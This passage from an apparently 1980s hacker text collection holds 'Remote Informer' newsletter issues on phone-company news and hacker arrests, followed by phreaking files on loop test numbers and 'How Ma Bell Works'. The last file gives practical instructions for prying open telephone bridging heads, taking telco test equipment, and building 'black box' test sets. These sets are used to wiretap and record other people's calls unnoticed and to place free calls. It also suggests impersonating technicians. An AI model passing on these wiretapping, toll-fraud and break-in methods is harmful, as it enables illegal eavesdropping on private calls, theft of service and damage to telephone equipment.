to various business and government computers.
     The arrests were the result of a 6 week investigation by the Secret
Service and the Mount Lebanon police. The police were tipped off by parents
who were suspicious about how their son managed to obtain a skateboard valued
at $140.
     The Secret Service was also involved in investigations that led to the
arrests of several hackers in San Francisco and New York last July.
     Secret Service spokesman William Corbett says that although some reports
have portrayed the hackers as part of a national crime ring, the cases are
unrelated.  "It's just that a few of these computers hacking cases came to a
head at about the same time," he says.
     Federal Legislation enacted in 1984 gives the Secret Service, part of the
Department of the Treasury, a major role in investigating computer crimes.
Under the federal Computer Fraud and Abuse Act of 1986, computer fraud is a
felony that carries a maximum penalty of 5 years for the first offense, and 10
years for the second.  Displaying unauthorized passwords on hacking bulletin
boards carries a maximum penalty of 1 year in prison for the first offense,
and 10 years for the second.
] This information was supplied by Ye Cap'n
==============================================================================
=                          German Teens Crack NASA                           =
==============================================================================
     Washington, D.C. -- A group of West German teenagers from the Chaos
Computer Club penetrated a NASA network recently, saying they were doing it to
"test the security."
     What they got into was SPAN Net, a computer network with about 700 notes,
which is actually based at the Goddard Space Center in Maryland.  All that's
in there is unclassified data, space science information, and post-flight data
anaysis.  "Anyone with NASA related research can apply for access to SPAN"
says a spokesman, who adds that the network runs on DEC VAX hardware.  "We
picked up three attempts to gain access and put in security precautions so it
would't happen."  His personal opinion is, "We're happy that they couldn't get
back in, and decided to go public."  He also added that NASA has many other
networks, many of the classified and "probably inpenetrable.  But I do not
want to challenge anybody."
     How'd they get in?  Probably they got a West German NASA licensee, which
gave them a visitor's pass, then they created new passwords with unlimited
security for themselves, after which getting around the network was easy.
] Supplied by Ye Cap'n
==============================================================================
    We look for information in anyway related to the newsletter.  If you have
something of interests, or something that you saw on television, or in the
newspaper, then upload it to one of the boards listed below.  You will receive
full credit.
Pirate's Hollow..................................................(415)593-6784
Bate's Motel.....................................................(619)267-0293
==============================================================================



##############################################################################
#                     _________________________________                      #
#                      /he Remote Informer Newsletter!                       #
#                                                                            #
#----------------------------------------------------------------------------#
# November                                                     TRI Issue: 04 #
#----------------------------------------------------------------------------#
#                                                                            #
#     The Editors: Tracker, Ye Cap'n, Norman Bates and The Reporter          #
#                                                                            #
##############################################################################
==============================================================================
=                 FCC Charges Much Ado About Not Much                        =
==============================================================================
     New Cannan, CT -- International Resource Develope of New Cannan, CT says
that the market bubble for packet switch networks like TeleNet is going to
burst by 1991, regardless of what the Federal Communications Commission does
about access charges.  Cheap fiber, which greatly increases the capacity, and
ISDN services, which let you share a phone line with your computer, will do
the business in, the report says.  Over the next four years, however, the
demand for packet switch services to will grow from $650 million to $1,612
million (If the Baby Bells are allowed to add competition to the market, the
$5/hour access charge cannot be passed though to the customers anyway).
] Supplied by Ye Cap'n
==============================================================================
=                   Pirate's Hollow Update                                   =
==============================================================================
     San Carlos, CA -- The Pirate's Hollow, one of the more popular BBS's in
the Bay Area, is installing several new features that will even add to it's
popularity.  For one, users will be able to gamble against each other by
betting on NFL games and participating in the Pirate's Hollow Lottery.  Also,
in order to support one of the best newsletters around, the Pirate's Hollow
will soon be adding a seperate module that will act as an outpost for The
Remote Informer.  This module will feature the older issues of the newsletter,
a section that will keep you abreast of updates of recently released
information, and a section that will show what is upcoming in the next issues
of The Remote Informer.
     The long-awaited database will soon be put online.  Over 800 textfiles
on a variety of subjects will be available to the users that pay the access
fee that will be determined at a later date.  Many more are on the way, and
will be included at no charge. The charge will be a one time charge though,
rather than a yearly payment.
     Another new option will be available by early December.  PC Pursuit
callback will be installed.  This will allow people to call and then get
called back if your area code is supported by PC Pursuit.  This will also
require a charge, to be set at a later date.
     The Pirate's Hollow has been doing well in its comeback to the
telecommunications world, but we need more callers in order to formulate a
more diverse user base.  Please spread the BBS # around while also trying to
make others aware of the newsletter.
==============================================================================
=                               Switching Systems                            =
==============================================================================
     There are currently three different forms of switching systems that are
present in the United States today. Step by Step (SxS), Crossbar, and the
Electronic Switching System (ESS) make up the group.  Phreaks have always been
a little tenative when it comes to "doing their work" once they have heard
about effects of switching systems on their hobby.  After researching this
topic, I have found that there really is not that much to be worried about.
Read on, while I share with you information which I have compiled about all of
these switching systems and their distinct features.
     The first switching system that was used in the country was called Step
by Step.  This was adopted in 1918 by Bell, and until 1978, they had over 53%
of all their exchanges using Step by Step (SxS).  This system is known for
it's long, confusing train of switches that are used for its step by step
switching.
     Step by Step has many disadvantages to phone users.  The switch train
becomes jammed fairly often, and it causes calls to be blocked.  Also, SxS
does not allow the use of DTMF dialing. This accounts for some of the areas in
the United States that cannot have touch tone dialing abilities.  A tremendous
amount of electricity and maintenance needs to accompany the SxS switching
system, which makes it even more impratical.  All in all, this is probably the
most archaic switching system around.  
    There are a number of ways to see if you are on SxS.  You will notice that
there are no pulsing digits after dialing.  Most sources say that the phone
company will sound like many typewriters.  SxS does not offer features such as
speed calling, call forwarding, three-way calling, call waiting, and other
such services.  Pay phones on SxS also will want your money before you receive
a dial tone.  This adds to the list of disadvantages labelled to that of the
Step by Step switching systems.
     Another type of switching system that is prevalent in the United States
is Crossbar.  Crossbar has been Bell's primary switcher after 1960, and three
types of it exists.  Number 1 Crossbar (1xB), Number 4 Crossbar (4xB), and the
Number 5 Crossbar (5xB).  In Crossbar, a switching matrix is used for all the
phones in an area, and when someone calls, the route is determined and is met
up with the other phone.  This matrix is set-up in horizontal and vertical
paths.  Unlike other swichting systems, in my research, I could not come up
with any true and definate distinguishing features of the Crossbar switching
systems.
     The Electronic Switching System (ESS) is yet another switching system
used in the United States and the most used of all three swicthing systems.
ESS is an extremely advanced and multi-faced type of switching system, and is
feared by marauders of the phone company everywhere.  With ESS, your phone
company is able to know every digit dialed (including mistakes), who you call,
when you called, and how long you were connected.  ESS is also programmed to
print out the numbers of people who make excessive calls to WATS numbers (800
services) or directory assistance.  This feature of ESS is called 800
Exceptional Calling Report, and has spelled the end of some forms of
continuous code hacks to certain extenders.  ESS can also be programmed to
print logs of who called and abused certain numbers as well.  Everything is
kept track of in its records.
     The aforementioned facts show that ESS has made the jobs of organizations
such as the FBI, NSA, and other phone company security forces easier.  Tracing
can be done in a matter of microseconds, and the result will be conveniently
printed out on the monitor of a phone company officer.  ESS is also programmed
to pick up any "foreign tones" on the phone line such as the many varied tones
emulated by boxes.
     ESS can be identified by a few features common in it.  The 911 emergency
service is covered in the later versions of ESS.  Also, you are given the dial
tone first when using a pay phone unlike that of SxS.  Calling services like
call forwarding, speed calling, and call waiting are also common to ESS.  One
other feature common to ESS is ANI (Automatic Number Identification) for long
distance calls.  As you can see, ESS is basically the zenith of all switching
systems, and it will probably plague the entire country by the early 1990's.
Soon after, we should be looking forward to a system called CLASS.  This
switching system will contain the feature of having the number of the person
that is calling you printed out on your phone.
     What have I concluded about these switching systems?  Well, they are not
good enough.  I know a few people employed by the phone company, and I know
for a fact that they do not have enough time these days to worry about code
users, especially in large, metropolitan areas.  So, I will go out on a limb
here, and say that a large portion of people will never have to worry about
the horrors of ESS.
] Written by Ye Cap'n
==============================================================================
=                  New Gizmo Can Change Voice Gender                         =
==============================================================================
     The most amazing device has turned up in the new Hammacher Schlemmer
catalog:  the telephone voice gender changer.
     What it does is change the pitch of your voice from, say, soprano to bass
-- a most efficient way to dissuade an obscene phone caller just as he's
getting warmed up.
     That is not the same as running a 45 r.p.m. record at 33. In digital
conversion, the pitch can be changed without altering the speed.
     The device runs on a 9-volt batter and attaches to the telephone mouth
piece with a rubber coupler that takes but a moment to slip on and off.
     With the changer switched on, says Lloyd Gray, a Hammacher Schlemmer
technical expert, "the effect is similar to what you hear when they interview
an anonymous woman on television and disguise her voice by deepening it."
"It's better for changing a woman's voice to a man's than the other way
around," Gray said.  A man can use it to raise the pitch of his voice, but he
still won't sound like a woman."
     A man could, however, use the changer to disguise his voice. But with the
device set on high, Gray's voice still could be identified as his own. On low,
his normal tenor became so gravel like that the words were unintelligible.
] Supplied by Tracker and The Reporter
==============================================================================

     We look for information in anyway related to the newsletter.  If you have
something of interests, or something that you saw on television, or in the
newspaper, then upload it to one of the boards listed below.  You will receive
full credit.
Pirate's Hollow..................................................(415)593-6784
Bates Motel......................................................(619)267-0293
==============================================================================

   Brought to you by Exodus in the Cookbook IV !!!!!!!!!!!!!!!!!!


##############################################################################
#                      _________________________________                     #
#                       /he Remote Informer Newsletter!                      #
#                                                                            #
#----------------------------------------------------------------------------#
# November                                                     TRI Issue: 05 #
#----------------------------------------------------------------------------#
#                                                                            #
#    The Editors:  Tracker, Ye Cap'n, Norman Bates, and The Reporter         #
#                                                                            #
##############################################################################
==============================================================================
=                                 AT&T Rates                                 =
==============================================================================
     WASHINGTON -- American Telephone & Telegraph Co. proposed Tuesday to
lower its interstate long-distance rates by an average of 3.6 percent to
reflect reduced costs in connecting to the local telephone network.
     The largest decrease -- 6.3 percent -- would be seen in day time prices
"because of the need to make those rates more competitive," AT&T said.
     Rates for calls made during evening hours would drop 2.2 percent and
calls made during the late night and weekends would be cut by 0.8 percent, the
company said.
     The rate reductions would take effect Jan. 1, if they are approved by the
Federal Communications Commission.
     Reacting to the proposed price cuts, MCI Communications Corp. and US
Sprint Communications Co., the nation's second-largest and third-largest long
distance companies respectively, said their response would depend on what the
FCC finally approves but both said they intended to remain competitive with
AT&T. AT&T, the nation's largest long-distance company, proposed to the FCC
that its rates drop as much as $800 million, but AT&T said the exact amount
will depend on the access charges the FCC allows the local telephone companies
to collect from long distance carriers, which must pay the fees to hook into
the phone local network.
     AT&T has challenged the new access rates filed by the regional Bell
operating companies, contending they are more than $1 billion too high.
In proposing its new rates, the long-distance leader told the FCC it
expects local companies' access fees to fall by at least $200 million -- which
would amount to an average rate reduction of less than 1 percent.  But the
company said it believes the FCC will order an additional $600 million in
reductions based on AT&T's challenge.
     "We're confident the FCC will recognize that access charges filed by the
local telephone companies need to be substantially reduced, which would mean
more savings for our customers," said Larry Garfinkel, AT&T vice president for
marketing.
     He said the company filed its proposed rates based on disputed charges
because "we wanted to let the public react ... and further to let the FCC have
full knowledge of where we were heading given our expectation that we had a
valid basis for our dispute."
     AT&T's long-distance rates have fallen by about 34 percent since the
company was stripped of its local operating companies by an antitrust decree
nearly four years ago.
     Since then, phone rate payers have been paying a larger share of the costs
of maintaining the local network through monthly subscriber line charges, now
$2.60 for residential customers.
     That has reduced the long-distance companies' share of local network
expenses, which they pay in the form of access charges.
     Jack Grubman, a telephone analyst with PaineWebber Inc., said AT&T's
proposal targets business customers because "that's where the competition is
and where the better (profit) margins are." In addition, it aims to keep the
pressure on competition in international calling by extending discounts to
more customers. Grubman added that, if the company's rate proposal is approved
by the FCC, he would expect no further cuts in AT&T rates in 1988.
     Wendell Lind, AT&T administrator of rates and tariffs, said the cuts for
business and residential customers are about the same because business cuts
are offset by a proposed $128 million increase in AT&T's private line rates.
     AT&T is the only long-distance company whose rates are regulated by the
FCC, but its prices set the pace for the industry. Though AT&T is far larger
than any of its competitors, its market share has been declining since
divestiture and the company now says it serves about 75 percent of the market.
     In addition to the reductions in basic long-distance rates, AT&T proposed
cutting prices by 5 percent and 5.7 percent for its Pro-America calling plans.
     The company also proposed to reduce prices by 2.9 percent for its 800
Service customers and 4.4 percent for WATS customers, although it would
increase the monthly access line charges for those plans by $3.20 to reflect
higher special access charges filed by the local phone companies.
] Supplied by Tracker and The Reporter
==============================================================================
=               US Sprint Operator Service Traffic Increases 40%             =
=                          New Center Added In Dallas                        =
==============================================================================
     ORLANDO, Fla. -- US Sprint Wednesday announced its long distance
operators who began saying, "May I help you?" just five months ago, are now
handling 3.5 million calls a month.
     The fiber-optic long-distance carrier, offering the only operator service
alternative to AT&T has experienced a 40 percent growth in operator service
calls since it announced its service July 1.
     Amanda Weathersby, US Sprint vice president of product marketing, said
Tuesday, "More and more people are taking advantage of our call completion
assistance and alternative billing arrangements.
     "Customer surcharges are the same as AT&T with the added benefit of US
Sprint's fiber-optic quality and lower long-distance rates."
     US Sprint currently offers person-to-person, station-to-station, call
completion and collect calling. US Sprint has announced an agreement with US
WEST Service Link that will allow anyone to call on US Sprint and charge
their calls to a Regional Bell Operating Co. calling card beginning in first
quarter 1988.
     "Previously, our operator service was available only on pre-subscribed
US Sprint phones and recently we added operator assistance for US Sprint FON
CARD customers," Weathersby said.
     "With this new agreement, we'll be able to expand our operator service
to markets such as pay phones, hospitals, and hotels/motels."
     The newest 24-hour operator service center in Dallas began operations on
Oct. 5.  US Sprint's other operator service centers are  in:  Cherry Hill,
N.J.; Atlanta; Lombard, Ill. and Reno, Nev.
     US Sprint is a joint venture of United Telecommunications Inc. of Kansas
City, Mo. and GTE Corp. of Stamford, Conn.
] Supplied by Tracker and The Reporter
==============================================================================
=             Pacific Bell Pursuing Calling Card Thief                       =
==============================================================================
     SAN FRANCISCO--(BW)--Pacific Bell is warning consumers to protect their
telephone calling cards like any other credit card in the wake of a series of
frauds by people posing as phone company employees.
     A Pacific Bell spokesman says customers in the 213, 805 and 916 area
codes are being victimized by someone who says he is a telephone company
employee investigating calling card fraud.  The individual calls people at
home at odd hours, asking for their calling card numbers.  He then sells the
numbers to people who use the numbers to make long distance phone calls.
     As recently as Monday of this week, 180 long distance calls were billed
to a Sacramento area resident who had given his number to the thief just three
hours earlier.
     According to Pacific Bell, this kind of scheme and other forms of calling
card fraud cost telephone customers nationwide half a billion dollars a year.
     The company offered these tips to consumers to avoid becoming a victim of
calling card fraud:
     Never give your calling card number or personal identification number to
anyone.  Any telephone company employee with a legitimate need to know the
number has access to it.    
     Treat your calling card like any other credit card.  Report its loss
immediately by calling the 800 number on the back of the card 800-621-0430.
     If you receive a suspicious call regarding your telephone calling card,
report it by calling the 800 number on the back of the card.    
     If you receive a call from someone claiming to be a telephone company
employee and asking for your calling card number, ask for a name and number to
call back.  Then call the local Pacific Bell business office to report the
incident.
     One suspect was arrested in Southern California last week by a quick
thinking customer who did just that.  Pacific Bell immediately contacted the
local police department.  A suspect holding seven stolen calling card numbers
was arrested minutes later.
     Pacific Bell and long-distance telephone companies will credit customers
for calling card charges determined to be fraudulent.  Pacific Bell is a
subsidiary of Pacific Telesis Group, a diversified telecommunications
corporation based in San Francisco.
] Supplied by Tracker and The Reporter
==============================================================================
     We look for information in anyway related to the newsletter.  If you have
something of interests, or something that you saw on television, or in the
newspaper, then upload it to one of the boards listed below.  You will receive
full credit.
Pirate's Hollow..................................................(415)593-6784
Bates Motel......................................................(619)267-0293
==============================================================================

  Brought to you in the Cookbook IV courtesy of Exodus!!!!!!!!!!


The Phreaker's Guide to Loop Lines          courtesy of the Jolly Roger

    A loop is a wonderous device which the telephone company created as test
numbers for telephone repairmen when testing equipment.  By matching the
tone of the equipment with the tone of the loop, repairmen can adjust and test
the settings of their telephone equipment.
    A loop, basically, consists of two different telephone numbers.  Let's
use A and B as an example.  Normally if you call A, you will hear a loud
tone (this is a 1004 hz tone), and if you call B, the line will connect, and
will be followed by silence.
    This is the format of a loop line. Now, if somebody calls A and someone
else calls B--Viola!--A and B loop together, and one connection is made.
Ma Bell did this so repairmen can communicate with each other without
having to call their own repair office. They can also use them to exchange
programs, like for ANA or Ringback. Also, many CO's have a "Loop Assignment
Center".  If anyone has any information on these centers please tell me.
    Anyway, that is how a loop is constructed.  From this information,
anyone can find an actual loop line. Going back to the A and B example,
Note: the tone side and the silent side can be either A or B.  Don't be fooled
if the phone company decides to scramble them around to be cute.
   As you now know, loops come in pairs of numbers.  Usually, right after each
other.
 For example: 817-972-1890
                 and
              817-972-1891
   Or, to save space, one loop line can be written as 817-972-1890/1.
   This is not always true.  Sometimes, the pattern is in the tens or hundreds,
and, occaisionally, the numbers are random.
   In cities, usually the phone company has set aside a phone number suffix
that loops will be used for.  Many different prefixes will correspond
with that one suffix.
   In Arlington, Texas, a popular suffix for loops is 1893 and 1894, and
a lot of prefixes match with them to make the number.
 For Example:  817-460-1893/4
               817-461-1893/4
               817-465-1893/4
               817-467-1893/4
               817-469-1893/4
        ...are all loops...
   or a shorter way to write this is:
              817-xxx-1893/4
      xxx= 460, 461, 465, 467, 469
   Note: You can mix-and-match a popular suffix with other prefixs in a
city, and almost always find other loops or test numbers.
   Note: For Houston, the loop suffixes are 1499 and 1799.  And for Detroit
it's 9996 and 9997.
   When there are a large number of loops with the same prefix format,
chances are that many loops will be inter-locked.  Using the above example
of Arlington loops again, (I will write the prefixes to save space) 460, 461,
and 469 are interlocked loops.  This means that only one side can be used at
a given time.  This is because they are all on the same circuit. 
   To clarify, if 817-461-1893 is called, 817-460 and 469-1893 cannot be
called because that circuit is being used.  Essentialy, interlocked loops
are all the same line, but there are a variety of telephone numbers to access
the line.
   Also, if the operator is asked to break in on a busy loop line he/she
will say that the circuit is overloaded, or something along those
lines.  This is because Ma Bell has taken the checking equipment off
the line.  However, there are still many rarely used loops which can
be verfied and can  have emergency calls taken on them.
   As you have found out, loops come in many types.  Another type of loop is a
filtered loop.  These are loop lines that the tel co has put a filter on, so
that normal human voices cannot be heard on either line.  However, other
frequencies may be heard.  It all depends on what the tel co wants the
loop to be used for. If a loop has gotten to be very popular with the
local population or used frequently for conferences, etc. the tel co may filter
the loop to stop the unwanted "traffic".  Usually, the filter will be
removed after a few months, though.

                   ----------------Brought to you by Exodus



How Ma Bell Works                               by the Jolly Roger
        
In  this  article,  I  will first describe  the  termination,  
wiring,  and  terminal  hardware most commonly used in  the  Bell  
system, and I will include section on methods of using them. 
     ------------- 
     LOCAL NETWORK 
     ------------- 
The   local   telephone   network   between   the    central  
office/exchange  and  the  telephone subscribers can  be  briefly  
described as follows: 
From  the  central office (or local exchange) of  a  certain  
prefix(es), underground area trunks go to each area that has that  
prefix  (Usually  more than one prefix per area.)  At  every  few  
streets or tract areas, the underground cables surface. They then  
go to the telephone pole (or back underground,  depending on  the  
area)  and  then  to the subsribers house (or in the case  of  an  
apartment building or mutliline business,  to a splitter or  dis- 
tribution box/panel).  
Now  that  we have the basics,  I'll try and go in-depth  on  the  
subject. 
    ------------------ 
    UNDERGROUND CABLES 
    ------------------ 
These  are sometimes inter-office trunks,  but usually in  a  
residential  area they are trunk lines that go to bridging  heads  
or  distribution  cases.  The cables are about 2-3  inches  thick  
(varies),  and  are  either  in  a metal  or  pvc-type  pipe  (or  
similiar).  Rarely (maybe not in some remote rural areas) are the  
cables  just 'alone' in the ground.   Instead they are usually in  
an  underground cement tunnel (resembles a small sewer or  storm- 
drain.)   The manholes are >heavy< and will say 'Bell system'  on  
them.  they can be opened with a 1/2 inch wide crowbar (Hookside)  
inserted  in the top rectangular hole.  There are ladder rungs to 
help you climb down.  You will see  the cable  pipes on the wall, 
with the blue and white striped one being  the inter-office trunk 
(at  least  in my  area).  The others  are local  lines,  and are 
usually marked or color  coded.  There is almost  always a posted 
color code  chart on the wall, not to mention  Telco manuals de- 
scribing the cables and terminals, so I need not get into detail. 
Also, there is usually  some kind  of  test equipment,  and often 
Bell test sets are  left  in there. 
       -------------- 
       BRIDGING HEADS 
       -------------- 
The  innocent-looking  grayish-green boxes.   These  can  be  
either trunk bridges or bridging for residences.  The major trunk  
bridging  heads  are usually larger,  and they have the  'Western  
Electric' logo at the bottom,  whereas the normal bridging  heads  
(which  may  be different in some areas-depending on the  company  
you are served by.  GTE B.H.'s look slightly different.  Also, do  
not  be  fooled by sprinkler boxes!)  They can be found  in  just  
about every city. 
To open a bridging head: if it is locked (and you're feeling  
destructive),  put a hammer or crowbar (the same one you used  on  
the  manhole) in the slot above the top hinge of the right  door.   
Pull hard, and the door will rip off. Very effective! If it isn't 
locked (as usual),  take a 7/8 inch hex socket and with it,  turn 
the bolt  about 1/8 of a turn  to the  right  (you  should hear a 
spring release inside). Holding the bolt, turn the handle all the 
way to the left and pull out. 
To Check for a test-set (which are often left by Bell employees), 
go inside - First check  for a test-set  (which  are  often  left  
by  Bell  employees).   There should be a panel of terminals  and  
wires.   Push the panel back about an inch or so,  and rotate the  
top  latch  (round with a flat section)  downward.   Release  the  
panel  and it will fall all the way forward.  There is usually  a  
large  amount  of wire and extra terminals.   The  test-sets  are  
often hidden here,  so don't overlook it (Manuals,  as  well,  are  
sometimes placed in the head).   On the right door is a metal box  
of alligator clips.   Take a few (Compliments of Bell.).  On each  
door is a useful little round metal device. (Says 'insert gently'  
or'  clamp  gently - do not overtighten' etc..)  On the front  of  
the disc, you should find two terminals.  These are for your test  
set.   (If you dont have one, dont despair -I'll show you ways to  
make basic test sets later in this article). 
Hook the ring (-) wire to the 'r' terminal;  and the tip (+)  
wire  to the other.  (By the way,  an easy way to  determine  the  
correct polarity is with a 1.5v LED.   Tap it to the term.  pair,  
if  it  doesnt light,  switch the poles until it does.   When  it  
lights,find the longer of the two LED poles:  This one will be on  
the  tip wire (+).   Behind the disc is a coiled  up  cord.  This  
should have two alligator clips on it..  Its very useful, because  
you dont have to keep connecting and disconnecting the fone (test  
set) itself, and the clips work nicely. 
On  the  terminal  board,  there should be  about  10  screw  
terminals  per  side.   Follow the wires,  and you can see  which  
cable pairs are active.  Hook the clips to the terminal pair, and  
you're set!   Dial out if you want,  or just listen (If someone's  
on theline).  Later,  I'll show you a way to set up a true  'tap'  
that  will let the person dial out on his line and receive  calls  
as normal, and you can listen in the whole time.  More about this  
later... 
On  major  prefix-area bridging heads,  you can  see  'local  
loops' ,which are two cable pairs (cable pair = ring+tip,  a fone  
line)  that are directly connected to each other on the  terminal  
board.   These  'cheap  loops' as they are called,  do  not  work  
nearLy  as  well  as the existing ones set up  in  the  switching  
hardware  at the exchange office.   (Try scanning your  prefixes'  
00xx  to 99xx #'s.)  The tone sides will announce themselves with  
the 1008 hz loop tone,  and the hang side will give no  response.   
The  first  person  should dial the 'hang' side,  and  the  other  
person dial the tone side,  and the tone should stop if you  have  
got the right loop.) 
If  you want to find the number of the line that you're  on,  
you  can either try to decipher the 'bridging log' (or whatever),  
which is on the left door.  If that doesnt work,  you can use the  
follwing: 
     --------------------------- 
     ANI # (Automatic Number ID) 
     --------------------------- 
This  is a Telco test number that reports to you the  number  
that youre calling from (It's the same, choppy 'Bell bitch' voice  
that you get when you reach a disconnected #)  
For the   213 NPA - Dial 1223 
          408 NPA - Dial 760 
          914 NPA - Dial 990 
These  are  extremely useful when messing with any  kind  of line
terminals, house boxes, etc. 
Now that we have bridging heads wired, we can go on... (don't  
forget to close and latch the box after all... Wouldnt want GE  
and Telco people mad, now, would we?)  
     ------------------------------------- 
     "CANS" - Telephone Distribution Boxes 
     ------------------------------------- 

Basically, two types: 
1> Large, rectangular silver box at the end of each street. 
2> Black, round, or rectangular thing at every telephone pole. 
Type 1 -   This is the case that takes the underground cable from  
the  bridge and runs it to the telephone pole cable (The  lowest,  
largest  one  on the telephone pole.)  The box is always  on  the  
pole nearest the briging head, where the line comes up.  Look for  
the 'Call before you Dig - Underground cable' stickers.. 
The  case box is hinged,  so if you want to climb the  pole,  
you  can open it with no problems.   These usually have 2 rows of  
terminal sets.  
You  could try to impersonate a Telco technician and  report  
the  number as 'new active' (giving a fake name and fake  report,  
etc.)   I  dont recommend this,  and it  probably  won't  (almost  
positively won't) work,  but this is basically what Telco linemen  
do). 
Type  2 - This is the splitter box for the group of houses around  
the  pole  (Usually  4 or 5 houses).   Use it  like  I  mentioned  
before.   The terminals (8 or so) will be in 2 horizontal rows of  
sets.   The  extra  wires  that  are  just  'hanging  there'  are  
provisions for extra lines to residences (1 extra line per house,  
thats  why  the insane charge for line #3!)  If its the  box  for  
your  house  also,  have fun and swap lines with  your  neighbor! 
'Piggyback'  them  and  wreak havoc  on  the  neighborhood  (It's  
eavesdropping  time...)  Again,  I don't recommend this,  and its  
difficult to do it correctly.  Moving right along... 
     ------------------------------ 
     APARTMENT / BUSINESS MULTILINE 
           DISTRIBUTION BOXES 
     ------------------------------ 
Found  outside the buliding (most often on the  right  side,  
but not always...   Just follow the wire from the telephone pole)  
or  in the basement.   It has a terminal for all the lines in the  
building.   Use it just like any other termination box as before.  
Usually says 'Bell system' or similar.  Has up to 20 terminals on  
it (usually.) the middle ones are grounds (forget   these).   The  
wires come from the cable to one row (usually the left one), with 
the other row of terminals for the other row of terminals for the  
building  fone wire pairs.   The ring (-) wire is usually the top  
terminal if the set in the row (1 of 10 or more),  and the tip is  
in the clamp/screw below it.  This can be reversed, but the cable  
pair is always terminated one-on-top-of-each- other,  not on  the  
one  next  to  it.  (I'm  not sure why the other  one  is  there,  
probably as aprovision for extra lines) Don't use it  though,  it  
is usually to close to the other terminals, and in my experiences  
you get a noisy connection. 
Final note:  Almost every apartment, business, hotel, or anywhere  
there   is  more  than  2  lines  this  termination  lines   this  
termination method is used.  If you can master this type, you can  
be  in control of many things...   Look around in your area for a  
building  that  uses this type,  and practice hooking up  to  the  
line, etc. 
As  an  added  help,here is the basic  'standard'  color-code  for  
multiline terminals/wiring/etc... 
Single line:  Red = Ring 
            Green = Tip 
           Yellow = Ground * 
*  (Connected  to  the ringer coil  in  individual  and  bridged  
    ringer   phones (Bell only)  Usually  connected to the  green  
    (Tip) 
Ring (-) = Red 
           White/Red Stripe 
           Brown 
           White/Orange Stripe 
           Black/Yellow Stripe 
Tip (+) =  Green (Sometimes 
            yellow, see above.) 
           White/Green Stripe 
           White/Blue Stripe 
           Blue 
           Black/White Stripe 
Ground =   Black 
           Yellow 
      ---------------------- 
      RESIDENCE TERMINAL BOX 
      ---------------------- 
Small,  gray (can be either a rubber (Pacific Telephone) or  hard 
plastic  (AT & T) housing deal that connects the cable pair  from  
the  splitter box (See type 2,  above) on the pole to your  house  
wiring.  Only 2 (or 4, the 2 top terminals are hooked in parallel  
with the same line) terminals, and is very easy to use.  This can  
be  used to add more lines to your house or add an external  line  
outside the house. 
      --------- 
      TEST SETS 
      --------- 
Well,  now  you  can  consider  yourself a minor  expert  on  the  
terminals and wiring of the local telephone network.  Now you can  
apply  it  to whatever you want to do..  Here's another  helpful  
item: 
How  to  make  a Basic Test-Set and how to use it  to  dial  out,  
eavsdrop, or seriously tap and record line activity. 
These are  the  (usually) orange hand set fones  used  by  Telco  
technicians to test lines.   To make a very simple one,  take any  
Bell (or other,  but I recommend a good Bell fone like a princess  
or a trimline. gte flip fones work excllently, though..) fone and  
follow the instructions below. 
Note:    A 'black box' type fone mod will let you tap into  their  
line,  and with the box o,  it's as if you werent there. they can  
recieve  calls and dial out,  and you can be listening the  whole  
time! very useful.  With the box off, you have a normal fone test  
set. 
Instructions: 
A  basic black box works well with good results.   Take the cover  
off  the fone to expose the network box (Bell type  fones  only).   
The <RR> terminal should have a green wire going to it (orange or  
different  if  touch tone - doesnt matter,  its the same  thing).  
Disconnect the wire and connect it to one pole of an SPST switch.   
Connect  a  piece  of wire to the other pole of  the  switch  and  
connect it to the <RR> terminal.   Now take a 10k hm 1/2 watt 10%  
resistor  and  put  it  between the <RR>  terminal  ad  the  <F>  
terminal,  which  should have a blue and a white wire going to it  
(different for touch tone).  It should look like this: 
-----Blue wire----------<F> 
                   ! 
----White wire-----! 
                   ! 
              10k Resistor 
                   ! 
                   ! 
--Green wire--     !----<RR> 
              !    ! 
               SPST 
What  this  does in effect is keep the hookswitch  /  dial  pulse  
switch (F to RR loop) open while holding the line high with  the  
resistor.   This gives the same voltage effect as if the fone was  
'on-hook',  while  the 10k ohms holds the voltage right above the  
'off hook' threshold (around 22 volts or so, as compared to 15-17   
or normal off hook 48 volts for normal 'on-hook'), giving 
Test Set Version 2.
Another  design is similar to the 'type 1' test set (above),  
but has some added features:
From >----------------Tip------<To Test 
Alligator                        set 
Clip >----------------Ring-----<phone 
            !                ! 
            x                ! 
            !                ! 
            o                ! 
            !    x---RRRRR---! 
            !   x            ! 
            !---x            ! 
                 x----0------! 
x    = Spst Switch 
o    = Red LOD        0   = Green LED 
RRRRR= 1.8k 1/2 watt  xxxx= Dpst switch 
        resistor 
When the SPST switch in on, the LED will light, and the fone  
will become active.   The green light should be on.  If it isn't,  
switch  the dpst.   If it still isnt,  check the polarity of  the  
line and the LEDs.   With both lights on, hang up the fone.  They  
should all be off now.   Now flip the dpst and pick up the  fone.   
The  red  LED shold be on,  but the green shouldnt.   If  it  is,  
something is wrong with the circuit.  You wont get a dial tone if  
all is correct. 
When  you  hook  up  to the line with  the  alligator  clips  
(Assuming you have put this circuit inside our fona and have  put  
alligator clips on the ring and tip wires (As we did before)) you  
should  have the spst #1 in the off posistion.  This will greatly  
reduce the static noise involved in hooking up to a line. The red  
LED can also be used to check if you have the correct polarity. 
With  this  fone you will have the ability to listen  in  on  
>all< audible line activity,  and the people (the 'eavesdropees')  
can use their fone as normal. 
Note that test sets #1 and #2 have true 'black boxes', and can be  
used for free calls (see an article about black boxes). 

Test Set Version 3 

To do test set 3: 
Using a trimline (or similar) phone, remove the base and cut  
all  of  the wire leads off except for the red (ring -)  and  the  
green  (tip +).   Solder alligator clips to the  lug.   The  wire  
itself  is  'tinsel' wrapped in rayon,  and doesnt solder  well.   
Inside  the one handset,  remove the light socket (if it has one)  
and install a small slide or  toggle switch (Radio Shack's micro-  
miniature  spst works well).   Locate the connection of the  ring  
and the tip wires on the pc board near where the jack is  located  
at the bottom of the handset.  (The wires are sometimes black or  
brow instead of red and green,  respectively).   Cut the foil and  
run 2 pieces of wire to your switch.  In parallel with the switch  
add  a .25 uf 200 VDC capacitor (mylar,  silvered mica,  ceramic,  
not  an electrolytic).  When the switch is  closed,  the  handset  
functions normally.   With the switch in the other position,  you  
can listen without being heard. 
Note:  To  reduce the noise involved in connecting the clips to a  
line,  add  a  switch selectable 1000 ohm 1/2  watt  resistor  in  
series with the tip wire. Flip it in circuit when connecting, and  
once on the line, flip it off again. (or just use the 'line disc-  
onect'  type  switch as in the type 2 test  set  (above)).   Also  
avoid   touching the alligator clips to any metal parts or  other  
terminals,  for  i causes static on the line and raises  poeple's  
suspicions.  
      --------- 
      RECORDING 
      --------- 
If you would like to record any activity,  use test set 1 or  
